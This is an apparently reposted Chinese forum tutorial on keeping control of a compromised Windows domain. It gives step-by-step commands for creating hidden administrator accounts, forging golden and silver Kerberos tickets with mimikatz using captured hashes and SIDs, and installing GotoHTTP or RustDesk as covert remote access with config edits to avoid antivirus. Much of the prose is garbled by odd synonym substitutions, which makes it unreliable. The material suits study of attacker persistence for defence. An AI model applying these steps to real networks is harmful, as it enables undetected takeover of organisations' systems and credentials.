第142天: 内网安全-权限维持&黄金白银票据&隐藏账户&C2 远控&RustDesk&Got ...

打印 上一主题 下一主题

主题 866|帖子 866|积分 2598

案例一: 内网域&单机版-权限维持-基于用户-隐藏用户

项目下载地点: GitHub - wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具
用这个工具的话在域中会把它加入administrator组中,在单机环境中的话,不会划入任何组中,所以就会导致没办法删除
域环境

域中首先查看用户

利用工具添加隐藏用户的命令
  1. CreateHiddenAccount_upx_v0.2.exe -u jie -p admin!@#45
复制代码
这个时候查看用户还是没有增长

利用工具-c命令可以查看隐藏用户
  1. CreateHiddenAccount_upx_v0.2.exe -c
复制代码

在图形界面当中可以查看到

属于administrator用户组
 

尝试可否利用

利用密码建立ipc连接

点击删除是直接可以删除掉的

单机版


添加用户

查看用户

删除的时候删除不了

案例二: 内网域-权限维持-基于服务 TGT-黄金白银票据

黄金票据

      ⻩⾦   票据   ⽣   成攻击,是   ⽣   成有用的    TGT Kerberos    票据,而且不受    TGT   ⽣   命周期的影响   (   TGT    默认    10   ⼩   时,最多续订    7    天),这   ⾥   可以为任意   ⽤   户   ⽣   成   ⻩⾦   票据,然后为域管理        员   ⽣   成    TGT   ,这样普通   ⽤   户就可以变成域管理员。      获取域名和sid
   whoami    ##获取本地账户
net time /domain   ##获取域名
whoami /all      ##获取sid:S-1-5-21-1218902331-2157346161-1782232778
  获取当前域控是啥


需要获取krbtgt用户的hash,这个似乎必须得高权限,但是如今做的是权限维持,你已经拿下了域控,不外是利用域控的身份在普通用户内里创建
   privilege::debug
lsadump::lsa /patch /user:krbtgt   ##b097d7ed97495408e1537f706c357fc5
  
创建黄金票据
  1. mimikatz kerberos::golden /user:随便一个用户 /domain:god.org /sid:用户对应的sid /krbtgt:krbtgt用户的hash /ticket:pj
  2. mimikatz kerberos::golden /user:mary /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:pj
复制代码

把票据导入
   kerberos::ptt pj
  

查看当前的票据

dir查看文件

白银票据

      白银票据(   SILVER TICKET   )是利用域的服务账户举行伪造的    ST   ,在    Kerberos    认证        的第三步,   Client    带着    ST    和    Authenticator3    向    Server    上的某个服务举行哀求,        Server    接收到    Client    的哀求之后,通过本身的    Master Key    解密    ST   ,从而获得        Session Key   。所以只需要知道    Server    用户的    Hash    就可以伪造出一个    ST   ,且不会经        过    KDC   ,但是伪造的门票只对部门服务起作用(不需要交互    KDC   ,需要知道    Server    的        NTLM Hash   )。     首先获取机器用户的hash
   privilege::debug
sekurlsa::logonpasswords  ##946d7b4709666cc91a496aa9e834cba8
  

 导入白银票据,白银票据只能借助服务运行
  1. kerberos::golden /user:jie /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-GOD /service:cifs /rc4:946d7b4709666cc91a496aa9e834cba8 /ptt
  2. kerberos::golden /user:xxx用户名 /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash  /ptt
复制代码

cifs的话是文件共享服务,可以访问

案例三:内网域-权限维持-基于软件-GotoHTTP&RustDesk

GotoHTTP

下载地点:https://gotohttp.com/
gotohttp软件,优点无需安装,占用内存小,而且直接通过网页可以访问
上传以后直接实行会生成一个gotohttp.ini文件内里有访问的地点,以及账号密码
缺点是需要网络,但是内网一样寻常是不出网的
该软件需要走的是https协议,会主动帮你办理免杀题目
一样寻常可以利用cs中直接去查看这个文件

可以直接建立连接


RustDesk

这个步伐最大的优点就是可以在内网中不消出网建立连接,而且可以绕过一部门杀毒软件
远程版,也就是需要联网,他的登录的id以及密码在下面的文件中
   C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk.toml
  

直接输入id号通过密码连接即可

本地版
在下面这个文件中
   C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk2.toml
  加入这段数据
  1. direct-server = 'Y'      ##开启IP连接
  2. direct-access-port = '8443' ##端口   
复制代码

可以在内网中直接不出网建立连接

乐成建立连接


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

没腿的鸟

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表